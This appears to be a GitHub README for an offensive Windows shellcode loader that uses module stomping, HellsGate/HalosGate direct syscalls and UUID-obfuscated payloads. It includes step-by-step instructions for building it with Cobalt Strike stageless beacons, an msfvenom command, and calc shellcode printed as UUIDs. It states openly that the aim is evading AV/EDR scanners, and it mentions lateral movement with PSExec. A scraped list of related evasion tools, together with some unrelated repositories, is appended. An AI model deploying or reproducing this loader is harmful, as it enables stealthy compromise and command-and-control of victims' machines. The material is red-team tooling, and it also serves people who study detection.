Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!

Overview

Ninja UUID Shellcode Runner

Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!

Created by Bobby Cooke (@0xBoku) with Matt Kingstone(@n00bRage)

Update - Cobalt Strike Stageless Beacon Support (11/4/21)

This was tested in the new Certified Red Team Operator course labs which gives you Cobalt Strike access out-of-the-box. If you are interested in digging deeper into Cobalt Strike, I definitely recommend getting your hands dirty with this course!

Since the CRTO labs have Cobalt Strike, for security reasons they are not connected to the public internet. Another hurdle is we cannot copy entire files to and from our CRTO lab. What we can do, is copy-paste text from our host to the the CRTO lab. Since I think these labs are awesome, this walkthrough shows how to get this project working in the CRTO lab environment!

Cobalt Strike Stageless Beacon Walkthrough

  1. Start your Cobalt Strike teamserver & the cobaltstrike gui on the Kali-Attacker box
  • In the CRTO labs, cobaltstrike is located in the /opt/ directory, but this may differ based on your installation.
[email protected]:/opt/cobaltstrike# ifconfig
eth0: inet 10.10.5.120 
# Start the teamserver with the password myPassword123
[email protected]:/opt/cobaltstrike# ./teamserver 10.10.5.120 myPassword123
# Launch the cobaltstrike GUI and connect to it with any username and the password above
[email protected]:/opt/cobaltstrike# ./cobaltstrike
Screenshot of starting & connecting to the teamserver from the CRTO Kali-Attacker box

  1. Create a Listener that our stageless beacon payload will connect to, when it is executed on the windows host
  • From the CobaltStrike GUI, click Cobalt Strike from the menu bar, and then select Listeners
  • This will display the active listeners in a table, on the bottom half of the CS GUI

  • From the listeners table, click the Add button. A listener window will popup
  • Select your beacon type, such as BeaconHTTP used in this example
  • Give it a name, such as http used here
  • For the HTTP Hosts, click the + button and add the teamservers IP
  • When the beacon listener is the way you want it, click Save

  1. Create a 64-bit Stageless Cobalt Strike beacon shellcode payload
  • From the CobaltStrike GUI, click Attacks from the menu bar, then Packages, and select Windows Executable (S)
    • The (S) means that the payload will be Stageless. A Stageless payload has the entire beacon in it, while the Staged version only has a small stub that calls out to the teamserver and then loads the rest of the beacon.
    • The Staged loader used in Cobalt Strike is flagged. A Staged payload will likely be detected.

  • Select the http listener we just created.
  • Change the Output: to Raw
    • The Raw payload will save our Stageless Beacon as pure shellcode.
    • Since the Cobalt Strike Beacon uses the Reflective DLL Loading technique, the shellcode will execute the beacon when it is ran on an Intel x64 processor within a Windows OS.

  1. Switch to the Windows host and prepare the UUID runner to run our Beacon payload.
  • Open Visual Studios, and create a blank C++ project.

  • Within the new project, right-click the Source-File folder and click Add

  • Select C++ File (.cpp) and change the name to main.c

  • Do this again and create the file functions.asm

  • At this point we will have 2 files in our project.

  • Copy the code in main.c of this repo to the main.c file we just created in Visual Studios on our Windows-Attacker box within the CRTO labs.

  • Copy the code in functions.asm of this repo to the functions.asm file on our Windows-Attacker box.

  • In the VS Solution Explorer, select the Project.
  • Now select Project from the VS menu, and then Build Customizations...

  • From the Build Customizations popup window, check masm(targets, .props). This allows us to use Assembly in our VS project.

  • Now that Assembly is enabled in our project, we need to tell Visual Studios that our functions.asm file is an Assembly file, and to include it in our build.

  • From the Solution Explorer, right-click our functions.asm file and click Properties

  • In the Properties popup go to Configuration Properties -> General, and set the Item Type to Microsoft Macro Assembler. Then click OK to apply our changes.

  • Sometimes VS Optimization does not play well when creating projects with Assembly. For this reason we will disable optimization.
    • Select the project from the Solution Explorer.
    • Select Project from the main menu, and from the drop-down select <ProjectName> Properties
    • In the project Properties popup, select Configuration Properties -> Advanced
    • Change Whole Program Optimization to No Whole Program Optimization
    • Click OK to save changes

  1. Switch back to the Kali-Attacker box, convert beacon.bin to an array of UUIDs. and transfer beacon-uuids.txt to our Windows-Attacker Box
  • Copy the bin2uuid.py python3 script from this repo to the Kali-Attacker box.
  • Use the bin2uuids.py script to convert the beacon.bin payload into a C style array of UUIDs.
  • Run the script and have it output to the beacon-uuids.txt text file.
[email protected]:~# python3 bin2uuids.py beacon.bin > beacon-uuids.txt
  • Transfer the beacon-uuids.txt text file from the Kali-Attacker box to the Windows-Attacker box.
    • There are multiple ways to do this. One way is:
      • Open Cobalt Strike on the Windows-Attacker Box
      • Connect to the teamserver we have running on Kali-Attacker
      • Create a Beacon as above, but instead of Raw select Windows EXE
      • This will save the beacon to the Windows-Attacker file system
      • Execute the beacon, and switch to Kali-Attacker
      • Interact with the beacon from Kali-Attacker, and upload the text file with upload /root/beacon-uuids.txt
Transferring beacon-uuids.txt file with Cobalt Strike

  1. Compile Ninja_UUID_Runner with our Cobalt Strike Stageless Beacon payload
  • Now that our UUID encoded beacon paylaod is transferred to our Windows-Attacker box, open the beacon-uuids.txt with Notepad
  • Select all the text and copy it

  • Open main.c from our uuid project with Visual Studios.
  • Highlight the default CHAR* uuid[] payload, and paste our new Cobalt Strike Stageless Beacon payload.

  • Now that our project has our beacon baked-in, click the green play-button in Visual Studios, and get a beacon on the windows-attacker box!

  • By looking at the Output window in Visual Studios, we can see that our payload is saved to C:\Users\Administrator\source\repos\uuid\x64\Release\uuid.exe

  • We can now use this as our beacon payload when we need to move laterally by first uploading a beacon file and then executing it with something like PSExec!

About

Shellcode is typically loaded into the Heap of the process, or the VirtualAlloc() API is used to reserve a private section of memory where the shellcode is then loaded too. Regardless of where the shellcode is in memory, that allocated memory must be marked executable for the shellcode to run. This is typically done by calling the VirtualProtect() API, after the shellcode has been written to memory, to change the allocated memory from RW (Read-Write) to RX (Read-Execute). RX sections within modules are common, such as the executable .TEXT section of the host process, and the executable .TEXT section of a Dynamically Loaded Library (DLL) which has been loaded into the memory of the process. Although, RX or RWX executable memory sections within the Heap and Privately allocated sections, not backed by a module are suspicious, and easier to detect. To evade this detection, Module Stomping can be used.

Module Stomping is where the malware will load a DLL into the processes memory using the LoadLibrary() API, change the permissions of the loaded libraries memory to RW (writable), overwrite the DLL memory with the shellcode, change the module-backed memory back to RX (executable), and then execute the shellcode from the DLL memory. When the memory is scanned, the shellcode will appear to be just the executable code from the loaded DLL. Therefor this may evade some AV/EDR dynamic memory scanners.

Sektor7 does a better job of explaining it, and I recommend you check out there courses if you'd like to dive deeper: institute.sektor7.net

This dropper uses the Module Stomping technique described above, in combination with these techniques:

  • UUID Obfuscation of the shellcode payload.
    • The UUID payload helps to decrease the shellcodes entropy, which can help evade some detection methods.
    • This method also helps prevent some in-memory detections which flag on signatures.
  • Crawl the in-memory list of loaded modules to discover the base addresses of ntdll.dll and kernel32.dll.
  • Resolve NTAPI & WINAPI APIs by using a custom implementation of GetProcAddress() written in Assembly.
  • HellGate technique to resolve the Windows System Calls dynamically by reading the memory of ntdll.dll.
  • HalosGate technique to resolve the Windows System Calls if ntdll.dll is hooked by AV/EDR.
  • Direct Syscalls to changes the memory protection of the DLL which will host the shellcode.
  • "No New Thread" technique which uses EnumSystemLocalesA() to execute the UUID decoded shellcode.

Walkthrough Example with MSF PopCalc

  • First you will need a raw binary file that contains your shellcode.
  • For this example we will use MetaSploit's MSFVenom to create a simple "Pop Calc" shellcode for x64 Windows 10.
    • This shellcode was created from a Kali Linux virtual machine.

MSFVenom PopCalc Shellcode Creation

┌──([email protected])-[~]
└─$ msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 276 bytes
Saved as: calc.bin

Raw Shellcode File to UUIDs

  • Now that we have our raw shellcode file calc.bin we will use the bin2uuid.py python3 script to convert our shellcode into an array of UUIDs.
  • For large shellcodes, I recommend piping the output from the python script to a file. Then transfer the file over to your windows workstation where you will be compiling the dropper with windows Visual Studios.
┌──([email protected])-[~]
└─$ python3 bin2uuid.py calc.bin
    const char* uuids[] =
    {
        "e48348fc-e8f0-00c0-0000-415141505251",
        "d2314856-4865-528b-6048-8b5218488b52",
        "728b4820-4850-b70f-4a4a-4d31c94831c0",
        "7c613cac-2c02-4120-c1c9-0d4101c1e2ed",
        "48514152-528b-8b20-423c-4801d08b8088",
        "48000000-c085-6774-4801-d0508b481844",
        "4920408b-d001-56e3-48ff-c9418b348848",
        "314dd601-48c9-c031-ac41-c1c90d4101c1",
        "f175e038-034c-244c-0845-39d175d85844",
        "4924408b-d001-4166-8b0c-48448b401c49",
        "8b41d001-8804-0148-d041-5841585e595a",
        "59415841-5a41-8348-ec20-4152ffe05841",
        "8b485a59-e912-ff57-ffff-5d48ba010000",
        "00000000-4800-8d8d-0101-000041ba318b",
        "d5ff876f-f0bb-a2b5-5641-baa695bd9dff",
        "c48348d5-3c28-7c06-0a80-fbe07505bb47",
        "6a6f7213-5900-8941-daff-d563616c632e",
        "00657865-9090-9090-9090-909090909090"
    };

Copy UUID Shellcode to main.c

  • Copy the array of UUIDs to your windows workstation either via the copy-paste buffer or a file.
  • Open this project in Microsoft Visual Studios.
  • Within the main.c file, replace the uuids[] array with your array of UUIDs.

Optionally Change Sacrificial DLL

  • You may optionally change the sacrificial DLL that has its RX section module stomped by our shellcode by changing the sLib[] array to a name of a different DLL.
  • Make sure that the DLL is large enough to hold your shellcode or else you may end up overwriting a neighbor DLL in memory of the process.
  • Use the string2array.py python script to convert the DLL name into an array of chars.
  • Alternatively just use a typical string method since we are not creating a Beacon Object File (BOF) or shellcode.
┌──([email protected])-[~]
└─$ python3 string2array.py sLib mshtml.dll
CHAR sLib[] = {'m','s','h','t','m','l','.','d','l','l',0};
  • Replace the CHAR sLib[] array in main.c with the newly generated one.

Compile with Visual Studios

  • Once you have made your changes, compile the EXE with Visual Studios
  • If you are using the example provided, a calculator should popup when you press the green play button within Visual Studios.

Credits / References

Implementing ASM in Visual Studio C Projects

HalosGate SysCaller

HellsGate Syscaller

Great Resource for learning Intel ASM - Vivek Ramachandran (@vivekramac)

Other Projects/References that use the UUID Shellcode Loading Technique

Owner
Bobby Cooke
OSWE | eWPTX | OSCE | eCXD | OSCP | SLAE32|64
Bobby Cooke
Cobalt Strike BOF that uses a custom ASM HalosGate & HellsGate syscaller to return a list of processes

HalosGate Processlist Cobalt Strike BOF Cobalt Strike Beacon Object File (BOF) that uses a custom HalosGate & HellsGate syscaller, written in assembly

Bobby Cooke 50 May 12, 2022
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

Bobby Cooke 190 Jul 27, 2022
My version of psxfunkin with new changes like new story mode, new options,etc

PSXFunkin Friday Night Funkin' on the PSX LOL Compilation Refer to COMPILE.md here Characters Igor Ver added new characters Like XmasGF,Monster and mu

IgorSou3000 4 Jun 8, 2022
UUID generator.

UUID Generator Currently only version 4 is supported, but support for other versions might be added later. Use uuid_generate_4() to generate a UUID. U

David Reid 6 Jul 4, 2022
React Native polyfill for crypto.getRandomValues. Used in libraries like uuid.

react-native-random-values-jsi-helper React Native polyfill for crypto.getRandomValues. Used in libraries like uuid. Installation yarn add react-nativ

Matei Oprea 27 May 29, 2022
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.

Thread Stack Spoofing PoC A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to byp

Mariusz B. 663 Jul 27, 2022
EVA3: using hellsgate in EVA to get the syscalls [tested with cobalt strike 4.3]

EVA3: using hellsgate in EVA to get the syscalls [tested with cobalt strike 4.3] note that i dont claim that the idea is mine, this repo is probably

null 29 Jul 16, 2022
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)

Cobalt Strike BOF - Inject ETW Bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate) Running InjectEtwBypass BOF from Cobalt

Bobby Cooke 225 Jul 29, 2022
Hellsgate + Halosgate/Tartarosgate. Ensures that all systemcalls go through ntdll.dll

RecycledGate This is just another implementation of Hellsgate + Halosgate/Tartarusgate. However, this implementation makes sure that all system calls

null 249 Jul 27, 2022
sampctl-runner: Easy way to build and run package..

sampctl-runner Easy way to build and run package.. Usage Just enter the name of the repository from pawn.json and let the program do other things.. Ex

Emmett 1 Apr 17, 2022
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

anycall x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration Read: https://www.godeye.club/2021/05/14/0

Kento Oki 137 Aug 3, 2022
x64 Windows kernel driver mapper, inject unsigned driver using anycall

anymapper x64 Windows kernel driver mapper, inject unsigned driver using anycall This project is WIP. Todo Fix: Can't make API calls from IAT nor func

Kento Oki 68 Jun 22, 2022
very basic and minimalistic hooking "library" for windows (x64 support soon)

IceHook very basic and minimalistic hooking "library" for windows (x64 support soon) Example how to use: typedef void(__stdcall* twglSwapBuffers)(HDC

null 5 Jul 25, 2022
An open-source x64/x32 debugger for windows.

x64dbg An open-source binary debugger for Windows, aimed at malware analysis and reverse engineering of executables you do not have the source code fo

x64dbg 38.8k Aug 3, 2022
Hygieia, a vulnerable driver traces scanner written in C++ as an x64 Windows kernel driver.

Hygieia The Greek goddess of health, her name is the source for the word "hygiene". Hygieia is a windows driver that works similarly to how pagewalkr

Deputation 69 Jul 27, 2022
A FREE Windows C development course where we will learn the Win32API and reverse engineer each step utilizing IDA Free in both an x86 and x64 environment.

FREE Reverse Engineering Self-Study Course HERE Hacking Windows The book and code repo for the FREE Hacking Windows book by Kevin Thomas. FREE Book Do

Kevin Thomas 996 Aug 1, 2022
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses

Jektor Toolkit v1.0 This utility focuses on shellcode injection techniques to demonstrate methods that malware may use to execute shellcode on a victi

null 94 Jul 24, 2022
Easily hook WIN32 x64 functions

About Library for easy hooking of arbitrary functions in WIN32 x64 executables. Only requires target function address. Disassembles the function prolo

tcpie 17 Jun 12, 2022
Obfuscate calls to imports by patching in stubs. ICO works on both X86 and X64 binaries.

ICO adds a new section into the image, then begins building stubs for each import that uses a extremely basic routine to decrypt an RVA and places them into the section.

null 35 Jun 29, 2022